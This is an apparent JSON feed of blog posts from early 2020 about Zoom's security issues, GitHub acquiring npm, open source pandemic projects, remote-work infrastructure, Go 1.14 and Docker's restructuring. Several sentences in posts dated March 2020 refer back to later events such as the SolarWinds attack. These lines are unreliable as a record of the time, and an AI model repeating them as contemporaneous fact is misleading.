But maybe don\u0026rsquo;t publish that SIR model just yet.\n","date":"2 April 2020","externalUrl":null,"permalink":"/posts/200402-python-covid-data-science/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python and its data science ecosystem are playing a central role in COVID-19 analysis, from epidemiological modeling to resource allocation dashboards.","title":"Python at the Frontlines — How Data Science Is Shaping the Pandemic Response","type":"posts"},{"content":"Two weeks into the great remote work migration, one application has become synonymous with the new normal: Zoom. Daily meeting participants jumped from 10 million in December to reportedly over 200 million this month. Schools, businesses, governments, and families have all converged on this single platform. And the cracks are showing.\nThe term \u0026ldquo;Zoombombing\u0026rdquo; has entered the lexicon almost overnight. Uninvited guests are crashing meetings with offensive content, screen-sharing inappropriate material in classrooms, and generally exploiting the fact that Zoom prioritized ease of use over security for years. But having spent thirty years watching companies navigate the tension between usability and security, I can tell you: Zoombombing is the symptom, not the disease.\nThe Default Settings Problem # The root cause of Zoombombing is embarrassingly simple: Zoom meetings, by default, didn\u0026rsquo;t require passwords, and meeting IDs were short enough to be guessable or sharable. Anyone with a meeting link — or anyone willing to try random meeting IDs — could join.\nZoom has started rolling out fixes. Passwords are being enabled by default, and waiting rooms are being promoted more aggressively. But these are features that existed all along — they just weren\u0026rsquo;t the defaults. This is a classic case of a company optimizing for frictionless onboarding at the expense of security.\nI\u0026rsquo;ve seen this pattern repeatedly in my career. 
When a product is fighting for market share, every additional click in the setup flow is a potential lost user. Security features get tucked away in settings menus. Sensible defaults get loosened because \u0026ldquo;enterprise customers will configure it properly.\u0026rdquo; Then suddenly you have 200 million users, and the defaults are your security posture. This exactly mirrors what happened as remote work infrastructure was stress-tested during the pandemic shift.\nThe lesson for developers and product managers: your defaults are your security policy for 90% of your users. Most people never change settings. Design accordingly.\nThe Encryption Claims # More concerning than Zoombombing is the scrutiny around Zoom\u0026rsquo;s encryption practices. The Intercept reported that despite Zoom\u0026rsquo;s marketing materials claiming \u0026ldquo;end-to-end encryption,\u0026rdquo; the company actually uses transport encryption (TLS) for most calls. The encryption keys are generated and managed by Zoom\u0026rsquo;s servers, meaning Zoom itself could theoretically access meeting content.\nThere\u0026rsquo;s a meaningful technical distinction here. End-to-end encryption means only the participants can decrypt the communication — not even the service provider has access. Transport encryption means the data is encrypted in transit but the server can decrypt it. For a platform handling sensitive business meetings, medical consultations, and government communications, this distinction matters enormously.\nZoom has acknowledged the discrepancy, essentially admitting they used \u0026ldquo;end-to-end\u0026rdquo; loosely to mean \u0026ldquo;encrypted from endpoint to endpoint\u0026rdquo; rather than in the cryptographic sense. That\u0026rsquo;s\u0026hellip; not how cryptography works. You don\u0026rsquo;t get to redefine established security terminology for marketing convenience.\nTo be fair, implementing true end-to-end encryption for group video calls is genuinely hard. 
The server typically needs to decode and re-encode video streams to optimize bandwidth for each participant (Selective Forwarding Units vs. Multipoint Control Units). But the right response is to be transparent about your architecture, not to misrepresent it.\nThe Broader Privacy Picture # The security issues go beyond encryption. Researchers have uncovered several concerning behaviors:\nData sharing with Facebook: Zoom\u0026rsquo;s iOS app was sending analytics data to Facebook even for users who didn\u0026rsquo;t have Facebook accounts, via the Facebook SDK. Zoom removed this after it was reported, calling it an oversight.\nAttention tracking: Zoom had a feature that told meeting hosts if a participant\u0026rsquo;s Zoom window wasn\u0026rsquo;t in focus for more than 30 seconds. Think about what that means for employee surveillance.\nLinkedIn integration: Zoom\u0026rsquo;s LinkedIn Sales Navigator integration allowed meeting participants to access LinkedIn profiles of other attendees without their knowledge.\nLocal web server on Mac: Zoom previously installed a hidden web server on Macs that persisted even after uninstalling the app, ostensibly to bypass Safari click-to-open prompts.\nEach of these individually might be explainable as a product decision made in isolation. Taken together, they paint a picture of a company that consistently prioritized growth metrics over user privacy.\nWhat This Means for Enterprise Software # The Zoom situation is a case study in what happens when consumer-grade software gets deployed at enterprise scale without proper vetting. Many organizations adopted Zoom not through a formal procurement process but through bottom-up usage — employees downloading it because it \u0026ldquo;just worked\u0026rdquo; better than the official corporate tools.\nShadow IT has always been a challenge, but the sudden shift to remote work compressed what would normally be months of evaluation into days of desperation. 
IT departments that might have flagged Zoom\u0026rsquo;s security posture during a normal review cycle simply didn\u0026rsquo;t have time.\nThis should prompt every organization to ask: what other tools did we adopt in the rush to go remote? What are their security characteristics? Do we even know what our employees are using?\nMy Take # I don\u0026rsquo;t think Zoom is malicious. I think they\u0026rsquo;re a company that built a product optimized for ease of use in a competitive market, accumulated technical and security debt along the way, and suddenly found themselves operating at a scale that made that debt visible to everyone.\nThe real question is how they respond. So far, the signs are mixed. They\u0026rsquo;ve been quick to patch the most egregious issues, but the encryption misrepresentation suggests a cultural problem that patches alone won\u0026rsquo;t fix. Security and privacy need to be architectural decisions, not afterthoughts bolted on when the press starts asking questions.\nFor developers, the takeaway is straightforward: security defaults matter more than security options. Encryption claims need to be precise and auditable. And if your product suddenly scales by 20x, every shortcut you ever took will be found.\nI\u0026rsquo;m cautiously watching to see if Zoom treats this as a genuine inflection point or just a PR problem to manage. The next few weeks will tell us a lot.\n","date":"26 March 2020","externalUrl":null,"permalink":"/posts/200326-zoom-security-crisis/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Zoom’s explosive pandemic-driven growth is exposing serious security and privacy issues. 
The ‘Zoombombing’ phenomenon is just the tip of the iceberg.","title":"Zoom's Security Reckoning — When Rapid Growth Exposes Technical Debt","type":"posts"},{"content":"In the middle of a global pandemic, with most of us adjusting to working from home, GitHub quietly dropped one of the most significant announcements in JavaScript\u0026rsquo;s history: they\u0026rsquo;re acquiring npm. The news landed on Monday, and after a few days to digest it, I have thoughts. GitHub had just recently launched Actions as a CI/CD platform, setting the stage for this consolidation.\nFor the uninitiated, npm is the default package manager for Node.js and the world\u0026rsquo;s largest software registry, hosting over 1.3 million packages. If you\u0026rsquo;ve written JavaScript in the past decade, npm has been as fundamental to your workflow as your text editor. GitHub, of course, is where most of those packages\u0026rsquo; source code lives. The two have been inextricably linked for years — this acquisition just makes it official.\nThe Consolidation Play # Let\u0026rsquo;s be direct about what\u0026rsquo;s happening here: Microsoft (via GitHub) now controls both the place where JavaScript code is stored and the place where JavaScript packages are distributed. That\u0026rsquo;s an enormous amount of influence over the most widely used programming language in the world.\nGitHub already launched GitHub Packages last year, their own package registry that supports npm, Docker, Maven, and others. The npm acquisition accelerates that strategy significantly. Instead of competing with npm, they\u0026rsquo;re absorbing it.\nFrom a business perspective, it makes perfect sense. npm Inc. has struggled financially for years despite managing critical infrastructure. There were reports of layoffs and internal turmoil. The registry itself has had reliability issues. 
GitHub, backed by Microsoft\u0026rsquo;s resources, can invest in the infrastructure that npm desperately needs.\nWhat Developers Should Expect # Nat Friedman, GitHub\u0026rsquo;s CEO, has been clear that the npm registry will remain free and open. The public registry isn\u0026rsquo;t going anywhere. That\u0026rsquo;s the right call — any attempt to monetize it directly would trigger a mass exodus to a community fork or an independent registry.\nWhat I expect we\u0026rsquo;ll see is tighter integration between GitHub and npm:\nIdentity consolidation: Log into npm with your GitHub account. This simplifies things but also centralizes identity. Security improvements: GitHub has invested heavily in security tooling (Dependabot, security advisories). Bringing npm under that umbrella should mean better vulnerability scanning and automated patching. GitHub Actions integration: Publishing packages as part of CI/CD workflows will likely become seamless, especially as GitHub Actions matures as a platform. Improved infrastructure: The npm registry has had downtime issues. Microsoft\u0026rsquo;s cloud infrastructure should help. These are all genuinely good outcomes for the average developer. The npm experience has had rough edges for years, and GitHub has the engineering resources to smooth them out.\nThe Centralization Concern # Here\u0026rsquo;s where I put on my grumpy veteran hat. I\u0026rsquo;ve been building software since before the web existed, and I\u0026rsquo;ve watched the industry cycle between centralization and decentralization multiple times. 
We\u0026rsquo;re deep in a centralization phase right now, and this acquisition is a perfect example.\nConsider what Microsoft now controls in the JavaScript ecosystem:\nGitHub: Where the code lives npm: Where the packages are distributed VS Code: The most popular editor for JavaScript development TypeScript: The language that\u0026rsquo;s rapidly becoming the default for new JavaScript projects Azure: A major deployment target That\u0026rsquo;s not inherently evil — Microsoft under Satya Nadella has been a genuinely good steward of developer tools. But it\u0026rsquo;s a lot of eggs in one basket. The entire JavaScript supply chain, from writing code to publishing packages, can now flow entirely through Microsoft-owned infrastructure.\nThe open source community should be having a serious conversation about this. Not because Microsoft is likely to do something nefarious tomorrow, but because concentration of control over critical infrastructure is a structural risk regardless of who holds the keys.\nSupply Chain Security Implications # One area where this acquisition could have an immediate positive impact is supply chain security. The npm ecosystem has been plagued by security incidents — malicious packages, typosquatting attacks, and compromised maintainer accounts. The event-stream incident in 2018 demonstrated how a single compromised package deep in the dependency tree could affect millions of projects. Later incidents like the SolarWinds attack would underscore how critical supply chain security has become.\nGitHub\u0026rsquo;s security team has been doing solid work with automated vulnerability detection. If they can bring that expertise to npm — verifying package provenance, detecting suspicious publishes, flagging unusual dependency patterns — that would be a meaningful improvement for everyone.\nThe challenge is doing this without creating friction for legitimate package maintainers. 
The npm ecosystem\u0026rsquo;s strength has always been its low barrier to entry. Anyone can publish a package in minutes. Adding security gates that slow down that process would undermine what makes npm npm.\nMy Take # I think this acquisition is net positive in the short term and uncertain in the long term. npm needed investment it wasn\u0026rsquo;t getting as an independent company. The registry is too important to fail, and it was showing signs of strain. GitHub (and Microsoft) have the resources and the engineering talent to stabilize and improve it.\nBut I\u0026rsquo;d like to see the community invest more in alternatives and decentralization. Entropic, the federated package manager that some former npm employees started, represents the kind of thinking we need more of. Even if it never becomes the default, having viable alternatives keeps the ecosystem healthy.\nFor now, my advice to JavaScript developers is pragmatic: keep using npm, take advantage of the improved security tooling as it arrives, but don\u0026rsquo;t delete your Yarn lockfiles just yet. And if you\u0026rsquo;re a package maintainer, pay attention to the terms of service changes that will inevitably come. The details matter.\nThe JavaScript ecosystem has survived bigger upheavals than this. It\u0026rsquo;ll adapt. It always does.\n","date":"19 March 2020","externalUrl":null,"permalink":"/posts/200319-github-acquires-npm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s acquisition of npm consolidates the JavaScript ecosystem’s most critical infrastructure under one roof. Here’s why that matters — and what could go wrong.","title":"GitHub Acquires npm — What This Means for the JavaScript Ecosystem","type":"posts"},{"content":"Yesterday, the World Health Organization officially declared COVID-19 a global pandemic. 
As someone who\u0026rsquo;s been building software for three decades, I\u0026rsquo;ve seen the tech community respond to crises before — but nothing quite like what\u0026rsquo;s unfolding right now. Within days of the virus spreading beyond China\u0026rsquo;s borders, open source developers around the world started spinning up projects that are genuinely making a difference. The critical infrastructure challenges this exposed forced the entire industry to rethink operational practices.\nThe Johns Hopkins Dashboard # If you haven\u0026rsquo;t seen it yet, researchers at Johns Hopkins University built an interactive dashboard that tracks confirmed cases, deaths, and recoveries in real time. What makes this remarkable from a technical standpoint is that it\u0026rsquo;s powered by a publicly accessible GitHub repository that aggregates data from WHO, CDC, and dozens of regional health authorities.\nThe repository has exploded in activity. As of this week, it has thousands of stars and hundreds of forks, with contributors submitting pull requests to correct data, add new sources, and improve the ingestion pipeline. The data is published as CSV files — simple, portable, and easily consumed by any tool or language. It\u0026rsquo;s a masterclass in making critical data accessible.\nI\u0026rsquo;ve been pulling the data into a Jupyter notebook myself, partly out of professional curiosity and partly because the situation demands that we all pay attention. The fact that this resource exists because a handful of researchers decided to open-source their work is exactly why I\u0026rsquo;ve been an advocate for open source for decades.\nFolding@home Breaks Records # The distributed computing project Folding@home has seen an extraordinary surge in volunteers. The project, which uses idle computing power from volunteers\u0026rsquo; machines to simulate protein folding, launched specific COVID-19 work units this week. 
The response has been staggering — the project\u0026rsquo;s aggregate computing power has reportedly surpassed some of the world\u0026rsquo;s top supercomputers.\nFor those unfamiliar, Folding@home has been around since 2000, running on a simple but elegant model: download a client, donate your spare CPU/GPU cycles, and contribute to scientific research. The COVID-19 proteins they\u0026rsquo;re simulating could help identify potential drug targets. It\u0026rsquo;s one of those projects that reminds you what distributed systems are really about — not just microservices and Kubernetes clusters, but actual distributed computing in the original sense of the term.\nI installed the client on three machines in my home office this morning. If you have cycles to spare, I\u0026rsquo;d encourage you to do the same.\nRapid Collaboration on GitHub # Beyond these headline projects, GitHub is seeing a wave of COVID-related repositories. Developers are building everything from symptom checkers to supply chain coordination tools. Several governments are working on open source contact tracing solutions. The speed at which these projects are materializing is a testament to how much the developer ecosystem has matured.\nWhat strikes me is the tooling. Twenty years ago, coordinating a global open source response to a crisis would have taken weeks just to set up the infrastructure — mailing lists, version control, build systems. Today, a developer can create a GitHub repo, set up CI/CD with GitHub Actions, deploy to a cloud provider, and have contributors from six continents submitting PRs within hours.\nThe pandemic is also forcing interesting conversations about data standards. How do you normalize case counts across countries that report differently? How do you handle time zones in a global dataset? 
These are the kinds of mundane but critical engineering problems that open source communities are uniquely positioned to solve through collective expertise.\nThe Remote Work Experiment # I should note that this pandemic response is happening while the tech industry itself is undergoing a massive, unplanned experiment. Most major tech companies — Google, Microsoft, Amazon, Twitter — have told employees to work from home. Open source contribution, which has always been inherently remote-first, is suddenly the default mode for all software development.\nThere\u0026rsquo;s a certain irony here. The tools we built for distributed collaboration — Git, Slack, Zoom, CI/CD pipelines — are now the critical infrastructure keeping the entire industry running. Every standup is a video call. Every code review is asynchronous. The open source workflow that some managers once viewed skeptically is now the only workflow. GitHub Actions would emerge as the dominant CI/CD solution just months after, showing how pandemic-driven remote work accelerated tooling consolidation.\nMy Take # I\u0026rsquo;ve been through the dot-com crash, the 2008 financial crisis, and several \u0026ldquo;this changes everything\u0026rdquo; moments in tech. This feels different. The speed and scale of the open source community\u0026rsquo;s response to COVID-19 is unlike anything I\u0026rsquo;ve witnessed. It\u0026rsquo;s not just developers scratching their own itch — it\u0026rsquo;s developers applying their skills to a genuine humanitarian crisis.\nThe projects I\u0026rsquo;m most impressed by aren\u0026rsquo;t the flashiest. They\u0026rsquo;re the ones maintaining clean datasets, building accessible APIs, and writing documentation that non-technical researchers can follow. That\u0026rsquo;s the unglamorous work that actually moves the needle.\nIf you\u0026rsquo;re a developer looking to contribute, start with the COVID-19 Open Research Dataset (CORD-19), which contains over 29,000 scholarly articles. 
There\u0026rsquo;s meaningful NLP and data engineering work to be done making that corpus searchable and useful. Or contribute cycles to Folding@home. Or help maintain one of the dozens of tracking dashboards that public health officials are relying on. The sustainability questions facing open source maintainers would only become more acute as the pandemic stressed both individuals and communities.\nWe\u0026rsquo;re in for a rough few months. But seeing the open source community mobilize this quickly gives me real confidence that the tech industry\u0026rsquo;s response will be substantive, not just performative.\n","date":"12 March 2020","externalUrl":null,"permalink":"/posts/200312-open-source-pandemic-response/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As the WHO declares a pandemic, open source developers worldwide are mobilizing with tracking dashboards, distributed computing, and collaborative tools at unprecedented speed.","title":"Open Source Rallies — The Tech Community's Response to a Global Pandemic","type":"posts"},{"content":"This week, the conversation in tech shifted rapidly from \u0026ldquo;should we cancel the conference?\u0026rdquo; to \u0026ldquo;can our entire company work from home?\u0026rdquo; Twitter announced an optional work-from-home policy. Amazon told Seattle employees to work remotely if possible. Google is doing the same in Dublin. Microsoft, Square, and others are following suit. Mobile World Congress was cancelled weeks ago. Google I/O and Facebook F8 are looking increasingly uncertain. The tech community would soon mobilize comprehensive responses to the broader crisis.\nWhat interests me as an engineer isn\u0026rsquo;t the virus itself — I\u0026rsquo;ll leave that to the epidemiologists — but the sudden, large-scale stress test being applied to remote work infrastructure. 
We\u0026rsquo;re about to find out which companies actually invested in distributed-work capabilities and which ones just talked about it.\nThe VPN Bottleneck # Here\u0026rsquo;s a dirty secret about enterprise remote work: most companies\u0026rsquo; VPN infrastructure was never designed for 100% of employees connecting simultaneously. VPN concentrators are typically sized for 10-30% concurrent usage, because historically, remote work was the exception. If a company with 10,000 employees suddenly needs all of them on VPN, the existing hardware simply won\u0026rsquo;t handle it.\nI\u0026rsquo;ve been talking to infrastructure leads at several companies this week, and the scramble is real. VPN licenses are being purchased urgently. Split-tunnel configurations are being rolled out to reduce load — routing only corporate traffic through the VPN while letting YouTube and Spotify go direct. Some companies are discovering that their VPN infrastructure hasn\u0026rsquo;t been load-tested at these levels\u0026hellip; ever.\nThe smarter organizations moved to a zero-trust networking model over the past few years. Tools like Google\u0026rsquo;s BeyondCorp approach, or products like Cloudflare Access and Zscaler Private Access, authenticate users and devices without requiring a traditional VPN tunnel. If your applications are already accessible through an identity-aware proxy, scaling to 100% remote is primarily about bandwidth, not VPN capacity.\nCollaboration Tools Under Pressure # Slack, Microsoft Teams, Zoom, and Google Meet are about to experience usage spikes they\u0026rsquo;ve never seen. Zoom in particular has been riding a wave of adoption, and their infrastructure will be tested at scale. Video conferencing is bandwidth-intensive and latency-sensitive — the kind of workload that\u0026rsquo;s hard to scale gracefully.\nFor engineering teams specifically, the collaboration challenge goes beyond video calls. 
Code review, pair programming, incident response, and design discussions all have established in-office patterns that need remote equivalents:\nCode review translates well — GitHub and GitLab pull requests work the same regardless of where you sit Pair programming is harder — tools like VS Code Live Share and Tuple help, but they\u0026rsquo;re not yet standard Incident response needs a virtual war room — Slack channels plus a persistent video call, with clear communication protocols Whiteboarding is the biggest gap — Miro and Figma help, but the spontaneity of walking up to a whiteboard is hard to replicate Companies that already have distributed teams have solved most of these problems. GitLab, with its all-remote model and public handbook, is often cited as the gold standard. Basecamp and Automattic (the WordPress company) have been remote-first for years. The rest of the industry is about to get a crash course in what these companies learned the hard way.\nThe Development Environment Question # Here\u0026rsquo;s one that catches companies off guard: can your developers actually build and test the product from home? This sounds obvious, but many organizations have development dependencies that only work on the corporate network:\nInternal package registries and artifact repositories Shared development databases and staging environments License servers for commercial tools CI/CD pipelines that run on-premises Hardware test labs and device farms If your development workflow requires access to resources that are only reachable from the office network, you need a plan. The VPN approach works but adds latency and bandwidth constraints. 
A better long-term solution is making development infrastructure accessible securely from anywhere — containerized development environments, cloud-hosted CI/CD, and remote development servers.\nI\u0026rsquo;ve been running my development environment in Docker containers for the past year, with all dependencies defined in docker-compose.yml. When I work from home, my setup is identical to the office — same container images, same configurations, same behavior. Docker Desktop has matured significantly to support exactly this kind of portable development workflow. The initial investment in containerizing the dev environment pays dividends in exactly this scenario:\n# docker-compose.yml — portable dev environment version: \u0026#39;3.8\u0026#39; services: app: build: . volumes: - .:/workspace ports: - \u0026#34;3000:3000\u0026#34; postgres: image: postgres:12 environment: POSTGRES_DB: myapp_dev redis: image: redis:6-alpine What Companies Should Be Doing Right Now # If you\u0026rsquo;re in a position to influence your company\u0026rsquo;s technical infrastructure, here\u0026rsquo;s what I\u0026rsquo;d prioritize this week:\nLoad-test your VPN at 3x current peak usage. If it breaks, you need split-tunneling at minimum, and zero-trust networking as a strategic investment. Document everything that requires on-premises access. Create a spreadsheet of every service, tool, and resource that only works from the office. Each one is a single point of failure for remote work. Test your video conferencing at scale. Have a large all-hands meeting over video and see what breaks. Bandwidth, audio quality, screen sharing — find the problems before they\u0026rsquo;re critical. Ensure your CI/CD pipeline works for remote developers. If builds are triggered by pushing to a repository (as they should be), this is probably fine. If there are manual steps that require office access, fix them now. Write down your incident response process for a fully remote team. Who gets paged? 
What\u0026rsquo;s the communication channel? How do you coordinate when you can\u0026rsquo;t walk over to someone\u0026rsquo;s desk? My Take # I\u0026rsquo;ve worked remotely on and off for years, and I\u0026rsquo;ve long believed that most knowledge work can be done effectively from anywhere with a decent internet connection. What\u0026rsquo;s different about this moment is the speed and scale of the transition. Companies that planned for gradual adoption of remote work are being forced into it over the course of days.\nThe good news is that the tooling has never been better. Cloud infrastructure, container orchestration, modern collaboration tools, and fast home internet connections make remote work technically feasible for most software teams. The challenge is organizational, not technical — communication patterns, meeting culture, trust, and management practices all need to adapt.\nI suspect — and hope — that this forced experiment will permanently shift how the tech industry thinks about remote work. Even after the immediate health concerns pass, companies that discover their teams can be productive from home may not go back to mandatory office attendance. That would be a genuine silver lining.\nBut right now, the priority is making sure the infrastructure holds. Check your VPN. Test your tools. Document your dependencies. The stress test is coming.\nThis post is part of my Infrastructure Notes series. 
I have a feeling this topic is going to be a recurring one in the weeks ahead.\n","date":"5 March 2020","externalUrl":null,"permalink":"/posts/200305-tech-remote-work-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As tech companies start mandating work-from-home policies amid growing COVID-19 concerns, the infrastructure supporting remote work faces its biggest test yet.","title":"The Remote Work Stress Test — Is Our Infrastructure Ready?","type":"posts"},{"content":"Go 1.14 was released two days ago, and while it doesn\u0026rsquo;t grab headlines like a major version bump might, it\u0026rsquo;s one of those releases that makes the language meaningfully better to work with day-to-day. The headline features are the module system being declared \u0026ldquo;ready for production,\u0026rdquo; significant performance improvements in the runtime, and asynchronous goroutine preemption. Each of these addresses real friction points that Go developers have been dealing with. This parallels the pattern we\u0026rsquo;re seeing across the language ecosystem, where Python is making performance a priority and other languages are maturing their ecosystems.\nModules Are Finally Production-Ready # Go modules were introduced experimentally in Go 1.11 and have been gradually maturing since. With Go 1.14, the module system is officially recommended for all development, and GOPATH mode is on its way out. The go command now handles module-aware mode by default even outside of GOPATH, and the -mod=vendor flag is automatically applied when a vendor directory exists.\nFor those of us who\u0026rsquo;ve been using modules since Go 1.12, this isn\u0026rsquo;t a dramatic change. 
But there are meaningful improvements in how modules handle edge cases:\n# Module graph pruning is smarter go mod tidy # Now removes more unnecessary dependencies # The go.sum file is more accurate go mod verify # Better checksum verification The GOINSECURE environment variable is new and lets you specify modules that can be fetched without TLS — useful for internal corporate registries that haven\u0026rsquo;t gotten around to setting up proper certificates. It\u0026rsquo;s a pragmatic addition that acknowledges how Go is used in enterprise environments.\nWhat I appreciate most is the improved error messages when module resolution fails. Previously, you\u0026rsquo;d sometimes get cryptic errors about version constraints that required detective work to untangle. Go 1.14 does a better job of explaining why a particular version was selected or why a dependency can\u0026rsquo;t be resolved. Small quality-of-life improvements like this compound over time. This focus on developer experience mirrors what TypeScript has done with incremental improvements to make the language more usable.\nGoroutine Preemption — The Big Runtime Change # The most technically significant change in Go 1.14 is the move to asynchronous goroutine preemption. Previously, goroutines could only be preempted at function call boundaries — meaning a tight loop without function calls could monopolize an OS thread indefinitely. This was a real problem in production systems:\n// This goroutine could previously block the entire OS thread go func() { for { // Tight computational loop with no function calls // Other goroutines on this thread would starve } }() With Go 1.14, the runtime uses OS signals (specifically SIGURG on Unix systems) to preempt goroutines at almost any point. This means the scheduler can interrupt long-running computations to give other goroutines a chance to run.\nThe practical impact is significant for certain workloads. 
If you\u0026rsquo;re doing CPU-intensive computation — data processing, cryptographic operations, numerical work — your goroutines will now share CPU time more fairly. I\u0026rsquo;ve seen reports of improved tail latency in services that mix compute-heavy and I/O-bound goroutines on the same set of threads.\nThere\u0026rsquo;s a subtle implication for unsafe code, though. Because preemption can now happen at almost any instruction, code that uses unsafe.Pointer in ways that violate the rules (holding derived pointers across potential preemption points) might break. The Go documentation on unsafe.Pointer rules has always been clear about this, but previously you could get away with violations because preemption only happened at predictable points. If you\u0026rsquo;re using unsafe, now is a good time to audit your code.\nPerformance Improvements Across the Board # Go 1.14 includes a grab bag of performance improvements that together make a noticeable difference:\nDeferred function calls are nearly zero-overhead in most cases. The compiler now inlines deferred calls when it can prove they\u0026rsquo;re straightforward, eliminating the previous ~35ns overhead per defer statement. This means you can use defer for cleanup without worrying about performance in hot paths.\nTimer precision is improved, which matters for network services that set timeouts and deadlines. The runtime now uses a more efficient timer heap.\nPage allocator improvements reduce memory allocation latency, particularly for programs that allocate and free large amounts of memory.\nThe defer improvement is the one I\u0026rsquo;m most excited about. Go has always encouraged using defer for resource cleanup — closing files, releasing locks, finishing spans — but the performance overhead meant that performance-sensitive code sometimes avoided it. 
With near-zero-overhead defer, there\u0026rsquo;s much less reason to write error-prone manual cleanup code:\nfunc processFile(path string) error { f, err := os.Open(path) if err != nil { return err } defer f.Close() // Now nearly free in most cases // ... process file return nil } The Testing Improvements # A smaller but welcome change: go test now reports a cleaner output format, and the -v flag produces streaming output instead of buffering it. This means you see test results as they happen, which is valuable for slow integration tests where you want to know progress without waiting for the entire suite to complete.\nThere\u0026rsquo;s also a new Cleanup method on testing.T and testing.B that registers cleanup functions for tests and benchmarks. It\u0026rsquo;s similar to defer but scoped to the test lifetime:\nfunc TestDatabase(t *testing.T) { db := setupTestDB(t) t.Cleanup(func() { db.Close() os.Remove(db.Path()) }) // ... test code } This is particularly useful in table-driven tests and sub-tests, where a defer inside a setup helper would run when the helper returns rather than when the test finishes.\nMy Take # Go 1.14 is exactly the kind of release I want to see from a mature language: focused on making existing patterns faster and more reliable, without adding complexity. There\u0026rsquo;s no new syntax to learn, no paradigm shifts to adjust to — just a better version of the tool you were already using.\nThe Go team\u0026rsquo;s discipline in resisting feature creep continues to impress me. Every release cycle, there are proposals for generics, sum types, enums, and other features that would make Go more expressive but also more complex. The team evaluates these carefully and says \u0026ldquo;not yet\u0026rdquo; more often than \u0026ldquo;yes.\u0026rdquo; As someone who works across multiple languages, I appreciate that Go remains a language I can put down for three months and pick up again without having missed a major new feature.\nThat said, the generics question looms large. 
The current draft design using contracts is being actively discussed, and I suspect we\u0026rsquo;ll see something concrete in the next year or two. For now, Go 1.14 makes the language we have today better, and that\u0026rsquo;s enough.\nIf you\u0026rsquo;re on Go 1.13, upgrade. The module improvements alone are worth it, and the defer performance gains are a free lunch. Just audit any unsafe code first.\nPart of my Developer Landscape series — tracking programming languages and tools as they evolve.\n","date":"27 February 2020","externalUrl":null,"permalink":"/posts/200227-go-1-14-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Go 1.14 ships with production-ready modules, major runtime improvements, and goroutine preemption. A solid release that addresses real developer pain points.","title":"Go 1.14 Arrives — Faster, Leaner, and More Module-Ready","type":"posts"},{"content":"It\u0026rsquo;s been about three months since Docker Inc. sold its Enterprise business to Mirantis, and the dust is starting to settle. The company that kicked off the container revolution is now a much smaller operation, focused squarely on Docker Desktop and Docker Hub — the developer-facing tools rather than the orchestration platform. Having watched Docker\u0026rsquo;s rollercoaster journey from the beginning, I think this pivot, while painful, might be exactly what the company needed. Kubernetes would continue its dominance in the orchestration space, establishing itself as the de facto standard for container management.\nHow We Got Here # The Docker story is a cautionary tale about the gap between technology adoption and business viability. Docker made containers accessible to millions of developers. Before Docker, containers existed (LXC, Solaris Zones, FreeBSD Jails), but they were the domain of systems administrators with deep Linux kernel knowledge. 
Docker wrapped the complexity in a developer-friendly CLI and image format, and the industry was never the same.\nBut Docker the company struggled to monetize Docker the technology. The open-source container runtime became a commodity almost immediately. When Docker tried to build an enterprise platform — Docker Swarm for orchestration, Docker Enterprise Edition for management — Kubernetes had already won that battle. Google\u0026rsquo;s backing, the CNCF ecosystem, and the sheer momentum of the Kubernetes community made Docker Swarm a hard sell to enterprise buyers.\nThe November 2019 deal saw Mirantis acquire Docker Enterprise, including Docker Swarm, Docker Trusted Registry, and the enterprise sales team. About 300 employees moved to Mirantis with the enterprise business, according to reports at the time, while Docker retained Docker Desktop and Docker Hub with a much smaller team. Scott Johnston took over as CEO with a mandate to focus on developers.\nDocker Desktop as the Core Product # If you\u0026rsquo;re a developer working on a Mac or Windows machine, Docker Desktop is probably already part of your daily workflow. It\u0026rsquo;s one of those tools that\u0026rsquo;s become so ubiquitous that you almost forget it\u0026rsquo;s a product someone has to build and maintain. Running Linux containers seamlessly on non-Linux operating systems is genuinely hard engineering — the Linux VM management, filesystem sharing, networking, and the integration with local tools all have to work together smoothly.\nDocker Desktop currently handles this remarkably well. The switch from the older Docker Toolbox (which used VirtualBox) to the native hypervisor integration (HyperKit on Mac, Hyper-V on Windows, with a WSL 2 backend in preview) was a significant improvement. On my MacBook Pro, starting a container takes seconds, and volume mounts — while still not as fast as native Linux — are workable for development.\nThe question is whether Docker Desktop alone can sustain a company. 
The current licensing model keeps it free for individual developers and small teams, but Docker has started signaling that enterprise features will come with a price tag. Features like vulnerability scanning, team management for Docker Hub, and enhanced security controls for Docker Desktop could form the basis of a subscription model.\nDocker Hub\u0026rsquo;s Critical Position # Docker Hub is Docker\u0026rsquo;s other crown jewel, and it\u0026rsquo;s in a stronger position than many people realize. With over 6 million repositories and billions of image pulls, Docker Hub is the de facto distribution mechanism for container images. Even if you run Kubernetes in production and never touch Docker\u0026rsquo;s runtime, there\u0026rsquo;s a good chance your base images come from Docker Hub.\nThis network effect is powerful but fragile. GitHub Packages is growing, Google Container Registry and Amazon ECR serve their respective clouds well, and projects like Harbor provide self-hosted alternatives. Docker Hub\u0026rsquo;s advantage is inertia and the sheer volume of existing content — every major open source project publishes official images there.\nThe recent introduction of rate limiting on Docker Hub pulls has been controversial but economically necessary. The infrastructure costs of serving billions of image pulls are substantial, and Docker needs revenue to survive. I expect we\u0026rsquo;ll see more tiering and paid features around Docker Hub in the coming months.\nThe Container Runtime Question # Here\u0026rsquo;s an interesting technical subplot: Kubernetes is moving away from Docker as a container runtime. The Container Runtime Interface (CRI) allows Kubernetes to use containerd or CRI-O directly, bypassing the Docker daemon entirely. This doesn\u0026rsquo;t mean Docker images stop working — they\u0026rsquo;re all OCI-compliant — but it does mean that in production Kubernetes clusters, the Docker daemon is increasingly unnecessary overhead. 
